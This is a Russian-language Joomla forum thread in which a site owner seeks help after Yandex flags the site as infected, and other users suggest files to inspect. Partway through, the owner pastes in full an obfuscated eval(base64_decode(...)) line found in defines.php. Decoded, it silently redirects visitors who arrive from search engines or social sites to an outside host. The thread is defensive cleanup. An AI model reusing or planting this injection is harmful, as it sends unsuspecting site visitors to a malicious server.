Вирус. Поведенчиский анализ - Joomla 1.5: Общие вопросы

Давно не производились работы над сайтом и тут yandex сказал что у меня вирус "поведенческий анализ"
И отобразил зараженные страницы:
   
http://www.rim-law.ru/   
http://www.rim-law.ru/services/individuals/sud/itemlist/user/63-2013-05-12-03-34-21.html?start=10   
http://www.rim-law.ru/services/mezdunarodnie-svizi/2011-04-07-16-09-31/itemlist/user/63-2014-05-14-15-09-59.html?start=20   
http://www.rim-law.ru/services/real-estate/privatizasia.html      
http://www.rim-law.ru/services/real-estate/privatizasia/itemlist/user/63-2014-04-15-07-53-14.html   
http://www.rim-law.ru/services/real-estate/soglosovanie-pereplanirovok/itemlist/user/62-administrator.html?start=30

Я уже удалил все что можно и нельзя но не чего не помогает. Подскажите хоть куда копать. Ранее когда yandex находил вирус там было все понятно. Ссылки на сторонние сайты ... Но тут я не чего не могу найти.

Проверь файл /includes/defines.php ищи файлы a.php and movie.php
http://joomlaforum.ru/index.php/topic,246899.msg1470538.html#quickreply

да не обязательно там, пихают и в components/ и глубже
вчера только выгребала это

Проверь файл /includes/defines.php ищи файлы a.php and movie.php

Проверь файл /includes/defines.php ищи файлы a.php and movie.php

Прямо в этом файле в верхней строчки нашел:
<?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYWxmc3lzdGVtLmNvbS5teS9pbmNsdWRlcy9kb21pdC8xLnBocCIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="))

Этого на сколько я понимаю точно быть не должно. Буду пытаться найти еще. Спасибо 

Проверь файл /includes/defines.php ищи файлы a.php and movie.php
http://joomlaforum.ru/index.php/topic,246899.msg1470538.html#quickreply

Более того я на той недели данные файлы удалял: a.php and movie.php

да не обязательно там, пихают и в components/ и глубже
вчера только выгребала это

a.php and movie.php они лежали именно в этой папке. Как бы только на будущие обезопасить себя.

в com_contact еще посмотрите..

в com_contact еще посмотрите..

Спасибо за совет. Там все нормально